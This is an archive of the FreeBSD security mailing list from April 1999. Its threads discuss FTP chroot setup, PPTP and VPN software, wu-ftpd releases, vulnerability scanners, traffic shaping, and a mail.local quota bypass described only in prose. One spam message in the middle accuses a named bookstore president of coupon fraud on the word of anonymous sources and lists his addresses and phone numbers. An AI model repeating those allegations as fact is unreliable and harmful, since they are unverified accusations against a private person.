id MAA86034; Tue, 27 Apr 1999 12:59:34 +1000 (EST) (envelope-from danny@enya.clari.net.au) Date: Tue, 27 Apr 1999 12:59:33 +1000 (EST) From: "Daniel O'Callaghan" To: Fernando Schapachnik Cc: erik , freebsd-security@FreeBSD.ORG Subject: Re: limit ftp users to their homedir In-Reply-To: <199904261236.JAA22225@ns1.sminter.com.ar> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > En un mensaje anterior, erik escribi=F3: > >=20 > > is there a way to deny a registered user 
access to anything but his own > > homedirectory? > >=20 On Mon, 26 Apr 1999, Fernando Schapachnik wrote: > I use wu-ftpd for this and works nice. I also has some other features. >=20 Why don't you just use the standard ftpd with FreeBSD? Put your users into a class called 'subscribers' or 'members' or whatever, and put :ftp-chroot: into the definition of that class in /etc/login.conf. You'll also want to=20 cd /usr/src/libexec/ftpd make -DFTPD_INTERNAL_LS make install so that your chrooted users can see files in their area (put ls(1) code into ftpd) Danny To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 26 23:32:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from crabcake.akamai.com (access.akamai.com [4.17.143.9]) by hub.freebsd.org (Postfix) with ESMTP id 6CC4814F65 for ; Mon, 26 Apr 1999 23:32:34 -0700 (PDT) (envelope-from dshaw@akamai.com) Received: from claude.akamai.com (crabcake.akamai.com [10.10.123.10]) by crabcake.akamai.com (8.8.7/8.8.7) with ESMTP id CAA14066 for ; Tue, 27 Apr 1999 02:32:27 -0400 Received: (from dshaw@localhost) by claude.akamai.com (8.8.7/8.8.7) id CAA01471 for freebsd-security@FreeBSD.ORG; Tue, 27 Apr 1999 02:20:53 -0400 Date: Tue, 27 Apr 1999 02:20:53 -0400 From: David Shaw To: freebsd-security@FreeBSD.ORG Subject: Re: VPN Message-ID: <19990427022053.C1398@jabberwocky.com> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <001d01be8fe9$71b51f80$6a8266ce@violet.neo.lrun.com> <4.1.19990427095335.0182be90@mail1.dcomm.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <4.1.19990427095335.0182be90@mail1.dcomm.net>; from Deepwell Internet on Tue, Apr 27, 1999 at 09:55:25AM -0700 X-PGP-Fingerprint: 3CB3B415/2048/4D 96 83 18 2B AF BE 45 D0 07 C4 07 51 37 B3 18 X-Phase-Of-Moon: The Moon is Waxing Gibbous (90% of Full) X-Current-Email-Backlog: 270 
X-Pointless-Random-Number: 2 X-Silly-Header: It sure is. X-Time-Til-Y2K: 35 weeks, 3 days, 22 hours, 41 minutes, 18 seconds X-URL: http://www.jabberwocky.com/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Apr 27, 1999 at 09:55:25AM -0700, Deepwell Internet wrote: > What about the Microsoft PPTP protocol? Are there any plans to get FreeBSD > to interact with NT/95 machines running PPTP? There was some guy who was making an open source (I forget which licence) PPTP clone for Unixish machines. Try searching for +pptp +unix on the web. Last I looked at it (4-5 months ago?) it was Not Ready For Prime Time. A lot can happen in 4-5 months, of course. David -- David Shaw | dshaw@jabberwocky.com | WWW http://www.jabberwocky.com/ +---------------------------------------------------------------------------+ "There are two major products that come out of Berkeley: LSD and UNIX. We don't believe this to be a coincidence." - Jeremy S. Anderson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 27 4:58:18 1999 Delivered-To: freebsd-security@freebsd.org Received: from postoffice.aims.com.au (advanc2.lnk.telstra.net [139.130.119.73]) by hub.freebsd.org (Postfix) with ESMTP id 9A00D14EBC for ; Tue, 27 Apr 1999 04:58:09 -0700 (PDT) (envelope-from Chris@aims.com.au) Received: from postoffice.aims.com.au (postoffice.aims.private [192.168.0.2]) by postoffice.aims.com.au (8.9.3/8.9.3) with SMTP id VAA27837 for ; Tue, 27 Apr 1999 21:58:28 +1000 (EST) Received: from nts-ts1 by aims.com.au with SMTP (MDaemon.v2.7.SP5.R) for ; Tue, 27 Apr 1999 22:01:10 +1000 Reply-To: From: "Chris Knight" To: Cc: Subject: RE: VPN Date: Tue, 27 Apr 1999 22:01:08 +1000 Message-ID: <001601be90a5$a3969170$0200a8c0@nts-ts1.aims.private> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: 
Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 In-Reply-To: <19990427022053.C1398@jabberwocky.com> X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Importance: Normal X-MDaemon-Deliver-To: freebsd-security@FreeBSD.ORG X-Return-Path: Chris@aims.com.au Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Howdy, There's a PPTP server project for Linux called PoPToP (http://www.moretonbay.com/vpn/pptp.html). It's covered by the GNU license. There's also a PPTP client for Linux (http://www.pdos.lcs.mit.edu/~cananian/Projects/PPTP/), which is also covered by the GNU license. I don't know of any efforts in porting these to FreeBSD though. Regards, Chris Knight Systems Officer AIMS Independent Computer Professionals Tel: +61 3 6334 6664 Fax: +61 3 6331 7032 Mob: +61 419 528 795 Web: http://www.aims.com.au > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of David Shaw > Sent: Tuesday, 27 April 1999 16:21 > To: freebsd-security@FreeBSD.ORG > Subject: Re: VPN > > > On Tue, Apr 27, 1999 at 09:55:25AM -0700, Deepwell Internet wrote: > > What about the Microsoft PPTP protocol? Are there any > plans to get FreeBSD > > to interact with NT/95 machines running PPTP? > > There was some guy who was making an open source (I forget > which licence) > PPTP clone for Unixish machines. Try searching for +pptp +unix on the > web. > > Last I looked at it (4-5 months ago?) it was Not Ready For > Prime Time. A > lot can happen in 4-5 months, of course. > > David > > -- > David Shaw | dshaw@jabberwocky.com | WWW > http://www.jabberwocky.com/ > > +------------------------------------------------------------- > --------------+ > "There are two major products that come out of Berkeley: > LSD and UNIX. > We don't believe this to be a coincidence." - Jeremy S. 
From owner-freebsd-security Tue Apr 27 05:35:28 1999
From: rhaas@unilat.com
To: rhaas@unilat.com
Subject: Attention: Coupon fraud alert!!!
Date: Tue, 27 Apr 1999 05:39:23 PDT
Message-Id: <199904270125.SM00153@unilate.com>

Please forward this article.

Texas Textbooks Coupon Fraud
"On or Off the Drag" by Richard Haas

Texas Textbooks, Inc. may have conspired to commit coupon fraud against
7-UP/Dr. Pepper. Sources claim that the President of Texas Textbooks, Inc.,
Morris Woods, instructed managers to have his employees separate coupons and
candies from Buy Back Promotional Packages that were put together by Market
Source, Inc. and www.taponline.com. Within the Buy Back Promotional Packages
were various candies, gum, and a coupon for a free 20 oz. 7-UP, as well as
other advertisements and promotions from various companies, such as Chevy,
University Subscription Service, Citibank, American Airlines, TIME magazine,
Student Financial Services, BMG Music Service, and Sprint. According to
sources, the 7-UP coupons and candies were separated and put into boxes,
while the rest of the packages were thrown into the dumpster behind Texas
Textbooks. These Buy Back Promotional Packages were supposed to have been
given to students during the Fall Buy Back season during finals week in
December, 1998.

The marketing company behind the packages, Market Source, Inc., was notified
about the problem in early January, 1999, but refused to do anything about
it. Woods, when telephoned regarding the alleged coupon fraud against
7-UP/Dr. Pepper, denied having any knowledge of the incident and hung up the
telephone on a reporter. Several former employees claimed that they were
threatened with being fired when they refused to participate in the
separation of the items. "Committing a possible felony is not worth five
dollars an hour," said a former employee.

Seven Up/Dr. Pepper, University Subscription Service, Sprint, Chevrolet Motor
Company, and the Coupon Information Center (CIC) have also been notified of
these activities.

Fraud is a crime punishable under both state and federal laws. Under Federal
Law, a person convicted of mail fraud can be sentenced up to five years in
prison and a fine of up to $250,000 for each count of the indictment. In
cases where the proceeds of the fraud are not reported for Federal Income Tax
purposes, conviction of tax evasion is punishable by up to 20 years
imprisonment and up to a million dollar fine for each count.

Photos available at: http://www.geocities.com/FashionAvenue/6916/fraud.htm

If you would like to express your concern about this, please contact:

Morris Woods
President, Texas Textbooks, Inc.
1514 Parker Ln
Austin, TX 78741-2563
(512) 462-2149
gsdesign@studybreaks.com

Texas Textbooks
2410B E. Riverside Drive
Austin, TX 78741
(512) 443-1257

Texas Textbooks
2338 Guadalupe
Austin, TX 78705
(512) 478-9833

Bonnie O'Neill-Totin
boneill@marketsource.com

From owner-freebsd-security Tue Apr 27 09:46:56 1999
From: Coranth Gryphon
Reply-To: gryphon@intech.net
To: Fernando Schapachnik
Cc: Igor Roshchin, freebsd-security@FreeBSD.ORG
Subject: Re: wu-ftpd: is there a vulnerability ? (was: Re: limit ftp users to their homedir)
Date: Tue, 27 Apr 1999 12:51:51 -0400
Message-ID: <3725EB27.58FAC00F@intech.net>
References: <199904261540.MAA23971@ns1.sminter.com.ar>

Fernando Schapachnik wrote:
>
> > wu-ftpd on FreeBSD was not vulnerable
> > to the most recent (realpath function) vulnerability due to
> > specifics of FreeBSD's implementation of the realpath function.

The FreeBSD version (and others with that codebase) are _less_ vulnerable.
The problem is with buffer overruns within the WU source, only some of
which are in the 'realpath' chunks.

> various Unices so I preferred to change to the VR version on
> FreeBSD machines also just to have the same software in all the

The 'VR' series has now become the 'official' WU line -- we took over
where 'Academ' left off.
Coming some time in May is the 2.5.0 release of WU-FTPd, with most of the
'VR' patches (up thru VR17) rolled in, plus additional security fixes.

The current VR series is on: ftp://ftp.vr.net/pub/wu-ftpd

Soon (when we finish getting organized :-), there will be:
http://www.wuftpd.org
ftp://ftp.wuftpd.org

-coranth
=========================================
[gryphon@wuftpd.org, gryphon@freebsd.org]
Open Source -- The Only Solution

From owner-freebsd-security Tue Apr 27 10:20:37 1999
From: Coranth Gryphon
Reply-To: gryphon@intech.net
To: James Wyatt
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: limit ftp users to their homedir
Date: Tue, 27 Apr 1999 13:25:34 -0400
Message-ID: <3725F30E.71220F1E@intech.net>

James Wyatt wrote:
> I just flat trust the FreeBSD ftpd more than the rest and it does
> all I need from it - including multi-anon users and internal ls.
...
> considering porting FreeBSDs ftpd to the other two. I know wuftpd is
> a great tool and is 'really fixed' now. I know the hole was tiny, but

As not everyone might be aware, a new group of people have picked up
development and support for 'wuftpd'. We've got the core of the old
'Academ', 'VR' and 'BERO' people, plus others who have made a lot of
contributions over the past couple years. The new line is modelled the
same as FreeBSD, with '-stable' and '-dev' (semi-experimental) branches.
WU-2.5.0 will be rolling out sometime in May, mainly to finalize the merge
of the various lineages.

It might be worth letting the two 'camps' (FreeBSD and the new Wu-FTPd)
work together, rather than both continuing development, especially since
it seems we're both heading in the same directions. Not that diversity
isn't good, but why duplicate all the effort?

Anyone know who the point-of-contact for the FreeBSD native 'ftpd' is?

-coranth
==========================================
[gryphon@freebsd.org, gryphon@wuftpd.org]
Open Source -- The Only Solution

From owner-freebsd-security Tue Apr 27 21:10:51 1999
From: mike@sentex.net (Mike Tancsa)
To: freebsd-security@FreeBSD.ORG
Subject: Re: VPN
Date: Wed, 28 Apr 1999 04:20:57 GMT
Message-ID: <37268c76.312300444@mail.sentex.net>
References: <001d01be8fe9$71b51f80$6a8266ce@violet.neo.lrun.com> <4.1.19990427095335.0182be90@mail1.dcomm.net>

On 27 Apr 1999 02:32:56 -0400, in sentex.lists.freebsd.misc you wrote:
>On Tue, Apr 27, 1999 at 09:55:25AM -0700, Deepwell Internet wrote:
>> What about the Microsoft PPTP protocol?
>> Are there any plans to get FreeBSD
>> to interact with NT/95 machines running PPTP?
>
>There was some guy who was making an open source (I forget which licence)
>PPTP clone for Unixish machines. Try searching for +pptp +unix on the
>web.
>
>Last I looked at it (4-5 months ago?) it was Not Ready For Prime Time. A
>lot can happen in 4-5 months, of course.

Doesn't seem to be much happening with the code, but it's at
http://www.pdos.lcs.mit.edu/~cananian/Projects/PPTP/release/pptp-linux-1.0.2.tar.gz

---Mike
Mike Tancsa (mdtancsa@sentex.net)
Sentex Communications Corp, Waterloo, Ontario, Canada

From owner-freebsd-security Wed Apr 28 12:33:33 1999
From: "Dmitriy V. Bokiy"
Reply-To: "Dmitriy V. Bokiy"
To: freebsd-security@FreeBSD.ORG
Subject: Vulnerability Scanner?
Date: Wed, 28 Apr 1999 23:31:10 +0400
Message-ID: <10979.990428@cityline.ru>

Hi, all!

Could anyone recommend some vulnerability scanners (system and/or network
services)? Maybe something general like COPS, or FreeBSD specific?

Thanks everyone in advance.

Dmitriy Bokiy

From owner-freebsd-security Wed Apr 28 13:10:56 1999
From: Sebastien GIORIA
Reply-To: Sebastien GIORIA
To: "Dmitriy V. Bokiy"
Cc: freebsd-security@freebsd.org
Subject: Re: Vulnerability Scanner?
Date: Wed, 28 Apr 1999 22:08:46 +0200
Message-ID: <19990428220846.D5407@FranceNet.fr>
In-Reply-To: <10979.990428@cityline.ru>; from Dmitriy V. Bokiy on Wed, Apr 28, 1999 at 11:31:10PM +0400
Organization: FranceNet

On Wed, Apr 28, 1999 at 11:31:10PM +0400, the keyboard of Dmitriy V. Bokiy wrote:
>
> Hi, all!
>
> Could anyone recommend some vulnerability scanners (system and/or
> network services)? Maybe something general like COPS, or FreeBSD specific?

For network, try nessus http://www.nessus.org (Free)
or ISS scanner http://www.iss.net (Commercial)

S.
--
--> Mouse chewed through power cable <--
Sebastien Gioria - FranceNet                gioria@francenet.fr
Unix && Security Administrator              security@francenet.fr
All of FreeBSD in French =========> http://www.freebsd-fr.org

From owner-freebsd-security Thu Apr 29 08:36:03 1999
From: Chris Shenton
To: Sebastien GIORIA
Cc: "Dmitriy V. Bokiy", freebsd-security@FreeBSD.ORG
Subject: Re: Vulnerability Scanner?
Date: 29 Apr 1999 11:35:55 -0400
References: <10979.990428@cityline.ru> <19990428220846.D5407@FranceNet.fr>
In-Reply-To: Sebastien GIORIA's message of "Wed, 28 Apr 1999 22:08:46 +0200"

On Wed, 28 Apr 1999 22:08:46 +0200, Sebastien GIORIA said:

Sebastien> For network, try nessus http://www.nessus.org (Free)
Sebastien> or ISS scanner http://www.iss.net (Commercial)

I've had good experience with Ballista, now from Network Associates as
CyberCop Scanner. Runs only on Solaris and NT these days though :-(

I use nmap routinely to scan networks for open ports, but that doesn't
tell you that sendmail-3.14159-pre-alpha-7 has a gaping root hole, etc...
It's a great place to start tho.
From owner-freebsd-security Thu Apr 29 19:00:30 1999
From: "Frank J. Beckmann"
To: freebsd-security@freebsd.org
Subject: Re: VPN
Date: Thu, 29 Apr 1999 22:30:22 +0200
Message-ID: <19990429223021.A18194@vogon.agala.harz.de>

In article you wrote:
>On Sun, 25 Apr 1999, Andrew Kenneth Milton wrote:
>
>>Use the skip port.
>
>I've been told that skip supports only two 40 bit and two 56 bit (des and
>rc-something being two of those) as well as SAFER, which has NSA written
>all over it.
>
>Can anyone comment on that?

That is true for the version of skip that Sun ships outside the USA. AFAIK
the version of skip in the ports collection uses up to 128 bits. That's why
you can only get it from Sun from within the USA. But you can also find it
on hacktic.

Frank

From owner-freebsd-security Thu Apr 29 19:00:35 1999
From: "Frank J. Beckmann"
To: freebsd-security@freebsd.org
Subject: Re: VPN
Date: Thu, 29 Apr 1999 22:32:54 +0200
Message-ID: <19990429223254.A19140@vogon.agala.harz.de>

>What about the Microsoft PPTP protocol? Are there any plans to get FreeBSD
>to interact with NT/95 machines running PPTP?

Don't use Microsoft PPTP, see http://www.counterpane.com/.

Frank

From owner-freebsd-security Thu Apr 29 22:00:45 1999
From: Randolf-Heiko Skerka
To: freebsd-security@FreeBSD.ORG
Subject: Re: Vulnerability Scanner?
Date: Fri, 30 Apr 1999 06:02:32 +0200
Message-ID: <19990430060232.A14831@merlin.itsec-debis.de>
References: <10979.990428@cityline.ru> <19990428220846.D5407@FranceNet.fr>
In-Reply-To: ; from Chris Shenton on Thu, Apr 29, 1999 at 11:35:55AM -0400

On Thu, Apr 29, 1999 at 11:35:55AM -0400, Chris Shenton wrote:
> I've had good experience with Ballista, now from Network Associates as
> CyberCop Scanner. Runs only on Solaris and NT these days though :-(

I agree. Ballista/CyberCop is quite nice. But I think NAI republished a
Linux version too. Don't know if there is a FreeBSD version.

> I use nmap routinely to scan networks for open ports, but that doesn't
> tell you that sendmail-3.14159-pre-alpha-7 has a gaping root hole, etc...
> It's a great place to start tho.

But the reason for this is that nmap is only a portscanner.
Randolf Skerka
--
+------------------------------------------------------------------------+
| Randolf Skerka               debis IT Security Services                |
| Tel. +49-228-9841-510        Rabinstrasse 8                            |
| Fax. +49-228-9841-60         53111 Bonn                                |
+------------------------------------------------------------------------+

From owner-freebsd-security Thu Apr 29 23:00:58 1999
From: Vitaly V Belekhov
To: GuangChun Wen
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Traffic Control in FreeBSD
Date: Fri, 30 Apr 1999 13:00:32 +0700 (NSS)
In-Reply-To: <005901be8704$d682fc40$b366b4cb@wen.iisi.co.jp>

Hi!

1. You can use DUMMYNET in 3.0 and higher, but its functionality is not
   so good as
2. CBQ.

On Thu, 15 Apr 1999, GuangChun Wen wrote:
> Hi everyone:
>
> I wonder if it is possible to use FreeBSD as a security gateway,
> and implement a traffic control mechanism on it in software?
>
> I have read rfc1633 and it seems that traffic control is usually
> done in the router with the help of hardware. I also heard that a
> Linux-based router product was on the market. What about FreeBSD?
> Do general Cisco routers have a traffic control function?
>
> Can anybody give me some advice?

From owner-freebsd-security Fri Apr 30 01:10:38 1999
From: Jay Tribick
To: Vitaly V Belekhov
Cc: GuangChun Wen, freebsd-security@FreeBSD.ORG
Subject: Re: Traffic Control in FreeBSD
Date: Fri, 30 Apr 1999 08:58:40 +0100
Message-ID: <19990430085840.C8650@lart.org.uk>
References: <005901be8704$d682fc40$b366b4cb@wen.iisi.co.jp>
In-Reply-To: ; "Vitaly V Belekhov" on 30.04.1999 @ 07:00:32 BST

> 1. You can use DUMMYNET in 3.0 and higher, but its functionality is not
>    so good as
> 2. CBQ.

We use http://www.etinc.com/ 's BWMGR device for FreeBSD - works fine and
is admin'able from a web page.

> > I wonder if it is possible to use FreeBSD as a security gateway,
> > and implement a traffic control mechanism on it in software?
> >
> > I have read rfc1633 and it seems that traffic control is usually
> > done in the router with the help of hardware. I also heard that a
> > Linux-based router product was on the market. What about FreeBSD?
> > Do general Cisco routers have a traffic control function?
> >
> > Can anybody give me some advice?
> > Best Regards,

--
Regards,

Jay Tribick
[| Network Admin | FastNet International | http://fast.net.uk/ |]
[| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |]
[| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |]

From owner-freebsd-security Fri Apr 30 02:30:34 1999
From: ark@eltex.ru
Organization: "Klingon Imperial Intelligence Service"
To: na.nu@na.nu
Cc: bsdl@riss-telecom.ru, GuangChun@paranoid.eltex.spb.ru, Wen@paranoid.eltex.spb.ru, freebsd-security@FreeBSD.ORG
Subject: Re: Traffic Control in FreeBSD
Date: Fri, 30 Apr 1999 13:28:59 +0400
Message-Id: <199904300928.NAA13736@paranoid.eltex.spb.ru>
In-Reply-To: <19990430085840.C8650@lart.org.uk> from "Jay Tribick"

nuqneH,

Jay Tribick said :

> > 1. You can use DUMMYNET in 3.0 and higher, but its functionality is not
> >    so good as
> > 2. CBQ.
>
> We use http://www.etinc.com/ 's BWMGR device for
> FreeBSD - works fine and is admin'able from
> a web page.

Good thing but it is binary :(

CU in Hell
/Arkan#iD
Do i believe in Bible? Hell,man,i've seen one!

From owner-freebsd-security Fri Apr 30 06:48:41 1999
From: "Pedro J. Lobo"
To: freebsd-security@freebsd.org
Subject: Does mail.local need to be setuid-root?
Date: Fri, 30 Apr 1999 15:47:18 +0200 (MET DST)

Hello, people.

I have a 3.1-RELEASE machine which, among other tasks, acts as a mail and
telnet server for our students. Recently I noticed that several users were
using more disk space than their quotas should allow (!). After a bit of
investigation, I have traced down the problem to the mail system.

The problem is that you can send mail to a user that is over quota, and
the system will append the new message to their inbox (located in /var/mail,
as by default). Indeed, root can append data to a file that belongs to a
user that is over quota.

As you may see, it is a rather ugly "feature". So, the question is: does
/usr/libexec/mail.local need to be setuid root? Or, alternatively, can I
use /usr/bin/mail as the local mailer? I also administer an alpha with
Tru64 Unix 4.0d and it uses /bin/mail (no setuid/setgid) as the local
mailer.

TIA,

Pedro.

--
-------------------------------------------------------------------
Pedro José Lobo Perea                   Tel: +34 91 336 78 19
Centro de Cálculo                       Fax: +34 91 331 92 29
E.U.I.T. Telecomunicación               e-mail: pjlobo@euitt.upm.es
Universidad Politécnica de Madrid
Ctra. de Valencia, Km. 7
E-28031 Madrid - España / Spain

From owner-freebsd-security Fri Apr 30 07:10:24 1999
From: Robert Watson
Reply-To: Robert Watson
To: "Pedro J. Lobo"
Cc: freebsd-security@freebsd.org
Subject: Re: Does mail.local need to be setuid-root?
Date: Fri, 30 Apr 1999 10:09:36 -0400 (EDT)

On Fri, 30 Apr 1999, Pedro J. Lobo wrote:

> Hello, people.
>
> I have a 3.1-RELEASE machine which, among other tasks, acts as a mail and
> telnet server for our students. Recently I noticed that several users were
> using more disk space than their quotas should allow (!). After a bit of
> investigation, I have traced down the problem to the mail system.
>
> The problem is that you can send mail to a user that is over quota, and
> the system will append the new message to their inbox (located in /var/mail,
> as by default). Indeed, root can append data to a file that belongs to a
> user that is over quota.
>
> As you may see, it is a rather ugly "feature". So, the question is: does
> /usr/libexec/mail.local need to be setuid root? Or, alternatively, can I
> use /usr/bin/mail as the local mailer? I also administer an alpha with
> Tru64 Unix 4.0d and it uses /bin/mail (no setuid/setgid) as the local
> mailer.

The need to setuid for local mail delivery is necessitated by the placement
of user-owned mailboxes in a shared directory. Clearly, there are other
possible arrangements that would work and not require the effective uid to
be root during mail delivery (for example, individual directories, etc).
ACLs would also provide a nice solution. Making mail.local setuid is
probably safer than making sendmail setuid, as sendmail has more exposure to
the world in the common case. Sendmail currently runs as root, but it's
easy to imagine, given capabilities, the ability to get rid of that.

Someone was floating patches at one point that modify mail.local to observe
file system quotas on the mail spool. I suspect a search on the -questions
archive will turn it up. They might have been added to the tree, but for
some reason I think they weren't. If the author is still around, they might
see a post to -hackers, if not here. If they're decent patches, I'd actually
really like to see them committed because I have some machines I'd like to
do the same thing on.

I personally use the Cyrus mail server instead on my larger mail machines.
Cyrus provides all kinds of spiffy functionality (including high-performance
POP, IMAP, fine-grained locking on IMAP messages, kerberos support, shared
mailboxes with ACLs, a management tool, etc).
While it isn't the same as having local mail, it's very similar in many environments, and there are a large and growing number of IMAP readers out there. Cyrus is available in the ports collection, but can also be built cleanly without using the port directly from the CMU distribution (my machines were used for this :). I recommend it highly :). The license allows for free use, but commercial redistribution requires negotiating with CMU for a license. Several companies have negotiated licenses and are selling commercial distributions, if you want support for it. Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 30 7:42: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sminter.com.ar (ns1.sminter.com.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 94A8B14C45 for ; Fri, 30 Apr 1999 07:41:53 -0700 (PDT) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id LAA09081; Fri, 30 Apr 1999 11:37:12 -0300 (GMT) From: Fernando Schapachnik Message-Id: <199904301437.LAA09081@ns1.sminter.com.ar> Subject: Re: Does mail.local need to be setuid-root? 
In-Reply-To: from Robert Watson at "Apr 30, 99 10:09:36 am"
To: robert+freebsd@cyrus.watson.org
Date: Fri, 30 Apr 1999 11:37:12 -0300 (GMT)
Cc: pjlobo@euitt.upm.es, freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL40 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In an earlier message, Robert Watson wrote:
> On Fri, 30 Apr 1999, Pedro J. Lobo wrote:
>
> > Hello, people.
> >
> > I have a 3.1-RELEASE machine which, among other tasks, acts as a mail and
> > telnet server for our students. Recently I noticed that several users were
> > using more disk space than their quotas should allow (!). After a bit of
> > investigation, I have traced down the problem to the mail system.
> >
> > The problem is that you can send mail to a user that is over quota, and
> > the system will append the new message to its inbox (located in /var/mail,
> > as by default). Indeed, root can append data to a file that belongs to a
> > user that is over quota.
> >
> > As you may see, it is a rather ugly "feature". So, the question is: does
> > /usr/libexec/mail.local need to be setuid root? Or, alternatively, can I
> > use /usr/bin/mail as the local mailer? I also administer an alpha with
> > Tru64 Unix 4.0d and it uses /bin/mail (no setuid/setgid) as the local
> > mailer.

You can use procmail, which doesn't need suid.

Regards.

Fernando P. Schapachnik
Network Administration
VIA Net Works Argentina SA

From owner-freebsd-security Fri Apr 30 08:28:15 1999
Delivered-To: freebsd-security@freebsd.org
Received: from haddock.euitt.upm.es (haddock.euitt.upm.es [138.100.52.102]) by hub.freebsd.org (Postfix) with ESMTP id EC62E14F69; Fri, 30 Apr 1999 08:27:57 -0700 (PDT) (envelope-from pjlobo@euitt.upm.es)
Received: from localhost (pjlobo@localhost) by haddock.euitt.upm.es (8.8.8/8.8.5) with ESMTP id RAA17565; Fri, 30 Apr 1999 17:24:52 +0200 (MET DST)
Date: Fri, 30 Apr 1999 17:24:51 +0200 (MET DST)
From: "Pedro J. Lobo"
To: Fernando Schapachnik
Cc: robert+freebsd@cyrus.watson.org, freebsd-security@FreeBSD.ORG
Subject: Re: Does mail.local need to be setuid-root?
In-Reply-To: <199904301437.LAA09081@ns1.sminter.com.ar>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=ISO-8859-1
Content-Transfer-Encoding: 8BIT
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 30 Apr 1999, Fernando Schapachnik wrote:

> In an earlier message, Robert Watson wrote:
> > On Fri, 30 Apr 1999, Pedro J. Lobo wrote:
> >
> > > As you may see, it is a rather ugly "feature". So, the question is: does
> > > /usr/libexec/mail.local need to be setuid root? Or, alternatively, can I
> > > use /usr/bin/mail as the local mailer? I also administer an alpha with
> > > Tru64 Unix 4.0d and it uses /bin/mail (no setuid/setgid) as the local
> > > mailer.
>
> You can use procmail, which doesn't need suid.

Maybe I'll give it a try. In the meantime, I've done a few more tests, and I
don't like too much what I've seen.

I have looked at the mail.local code, and it does a seteuid(2) to the
recipient's UID. So, why does the system allow it to write over quota?
I've written a small test program, and have found this: if you seteuid()
and open a file for writing, write() or fwrite() calls will fail (that is,
if the effective user is over quota). But, if you open the file, and call
seteuid() when the file is already open, then you can write as much data
as you want. As mail.local does this (first opens the user's mailbox, then
seteuid()'s), the quotas are ignored.

I think this is a bug, and that quotas should be checked (and applied)
every time you call write() or fwrite() or whatever. Opinions?

Pedro.

--
-------------------------------------------------------------------
Pedro José Lobo Perea                    Tel:    +34 91 336 78 19
Centro de Cálculo                        Fax:    +34 91 331 92 29
E.U.I.T. Telecomunicación                e-mail: pjlobo@euitt.upm.es
Universidad Politécnica de Madrid
Ctra. de Valencia, Km. 7
E-28031 Madrid - España / Spain

From owner-freebsd-security Fri Apr 30 08:30:11 1999
Delivered-To: freebsd-security@freebsd.org
Received: from haddock.euitt.upm.es (haddock.euitt.upm.es [138.100.52.102]) by hub.freebsd.org (Postfix) with ESMTP id 1F4B514F69; Fri, 30 Apr 1999 08:28:11 -0700 (PDT) (envelope-from pjlobo@euitt.upm.es)
Received: from localhost (pjlobo@localhost) by haddock.euitt.upm.es (8.8.8/8.8.5) with ESMTP id RAA17566; Fri, 30 Apr 1999 17:27:50 +0200 (MET DST)
Date: Fri, 30 Apr 1999 17:27:49 +0200 (MET DST)
From: "Pedro J. Lobo"
To: Robert Watson
Cc: freebsd-security@freebsd.org
Subject: Re: Does mail.local need to be setuid-root?
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=ISO-8859-1
Content-Transfer-Encoding: 8BIT
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 30 Apr 1999, Robert Watson wrote:

> On Fri, 30 Apr 1999, Pedro J. Lobo wrote:
>
> > /usr/libexec/mail.local need to be setuid root? Or, alternatively, can I
> > use /usr/bin/mail as the local mailer?
> > I also administer an alpha with
> > Tru64 Unix 4.0d and it uses /bin/mail (no setuid/setgid) as the local
> > mailer.
>
> The need to setuid for local mail delivery is necessitated by the
> placement of user-owned mailboxes in a shared directory. Clearly, there
> are other possible arrangements that would work and not require the
> effective uid to be root during mail delivery (for example, individual
> directories, etc). ACLs would also provide a nice solution.

In fact, mail.local tries to act as the recipient, but fails to do so. See
my response to Fernando Schapachnik.

Maybe I'll try cyrus later, but I need to fix this problem *now*!

Cheers,

Pedro.

--
-------------------------------------------------------------------
Pedro José Lobo Perea                    Tel:    +34 91 336 78 19
Centro de Cálculo                        Fax:    +34 91 331 92 29
E.U.I.T. Telecomunicación                e-mail: pjlobo@euitt.upm.es
Universidad Politécnica de Madrid
Ctra. de Valencia, Km. 7
